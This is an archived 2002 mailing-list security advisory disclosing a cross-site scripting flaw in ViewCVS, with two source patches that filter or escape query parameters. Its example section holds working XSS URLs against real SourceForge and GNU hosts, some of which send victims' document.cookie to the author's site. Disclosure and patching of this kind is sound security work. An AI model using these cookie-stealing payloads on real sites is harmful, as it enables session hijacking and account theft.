cross-site scripting bug of ViewCVS

From: office (officeat_private)
Date: Sat May 18 2002 - 17:32:24 PDT

Next message: FreeBSD Security Advisories: "FreeBSD Security Advisory FreeBSD-SA-02:24.k5su"

Previous message: Pidgorny, Slav: "Verisign PKI: anyone to subordinate CA"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

ViewCVS: cross-site scripting bug

I found the following cross-site scripting vulnerability in ViewCVS:


Details
------------
Product: ViewCVS
Affected Version: 0.9.2 and under it
Vendor's URL: http://viewcvs.sourceforge.net/
Vendor Status: Informed. And they already fixed it only in their team.
               But nothing has been published.


Introduction
------------
ViewCVS is a WWW interface for CVS Repositories. It is widely used in 
freesoft community and open source community. Unfortunately, it has 
the vulnerability of cross-site scripting.


Proof
-----------------
If you access to the URL like;

http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=>alert("hello")</script>
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>

The former URL is valid for Internet Explorer 6.0, Opera 6.01, but not 
valid for Netscape 4.78, Netscape 6.2.2, mozilla 0.9.9 on windows XP.
And these URL can do is only showing a popup window appearing.


Example
-----------------
For example, you can see the vulnerability at the SourceForge.net
 (Vendor's site is on SourceForge.net).

If you access to the sample URL following, your cookie (including 
your login information and session information about SourceForge.net) 
is stolen by my site (http://www.office.ac)

The stolen cookie's information of Internet Explorer 6.0 includes your 
login information and session information about SourceForge.net.
But the stolen cookie's information of Opera 6.01 and mozilla 0.9.9 
includes only user name, and the cookie information of Netscape 4.78 
and 6.2.2 is nothing. (I don't know why.)

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>

The ViewCVS at SourceForge.net is not newest version.
And you can see the vulnerability of newest version of ViewCVS at GNU.

http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=>alert("hello")</script>
http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script>


Vendor status
--------------
Vendors are noticed at 13 Mar 2002, and 26 Mar 2002.

And I heard following:
Some Japanese hackers (contributors belong to SourceForge.jp and 
Hyper NIKKI System Project) proposed a patch program to ViewCVS team 
in April. But ViewCVS team rejected it. ViewCVS team said they 
fixed it at April 1st.
But nothing has been published by ViewCVS team after it.


Patch
--------------
Two patches are here. I got these patches with the non-safe method,
so I am not sure that their code are completely same to original.
And I cannot understand about code nor programming at all.
So I don't have any accountability about these patch.

One was made by Kenji Suzuki <kenjiat_private> / Hyper 
NIKKI System Project (http://www.h14m.org/).
I heard it has been applied to the web page of Hyper 
NIKKI System Project, and Sourceforge.jp.

--- viewcvs.py.orig	Fri Dec 14 23:14:39 2001
+++ viewcvs.py	Sun Mar 31 15:24:34 2002
@@ -172,7 +172,7 @@
     # parse the query params into a dictionary (and use defaults)
     query_dict = default_settings.copy()
     for name, values in cgi.parse().items():
-      query_dict[name] = values[0]
+      query_dict[name] = cgi.escape(values[0])
 
     # set up query strings, prefixed by question marks and ampersands
     query = sticky_query(query_dict)



I heart another patch is made by ViewCVS team.  I got this code
from Taku YASUI <tachat_private> / Sourceforge.jp 
(http://sourceforge.jp/) who had been proposed former patch to 
ViewCVS team.


===================================================================
RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v
retrieving revision 1.107
retrieving revision 1.108
diff -u -r1.107 -r1.108
--- viewcvs/viewcvs/lib/viewcvs.py	2002/02/22 09:20:46	1.107
+++ viewcvs/viewcvs/lib/viewcvs.py	2002/04/01 01:32:16	1.108
@@ -180,8 +180,14 @@
 
     # parse the query params into a dictionary (and use defaults)
     query_dict = default_settings.copy()
+
+    # RE that ViewCVS doesn't use in any URL, but a CSS attack might
+    re_url_validate = re.compile('\'|"|<|>')
     for name, values in cgi.parse().items():
-      query_dict[name] = values[0]
+      # do not accept values that contain non-ViewCVS characters
+      # except for search
+      if not re.search(re_url_validate, values[0]) or name == 'search':
+        query_dict[name] = values[0]
 
     # set up query strings, prefixed by question marks and ampersands
     query = sticky_query(query_dict)


--
office
officeat_private
officeat_private
http://www.office.ac/

Next message: FreeBSD Security Advisories: "FreeBSD Security Advisory FreeBSD-SA-02:24.k5su"
Previous message: Pidgorny, Slav: "Verisign PKI: anyone to subordinate CA"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun May 19 2002 - 00:26:11 PDT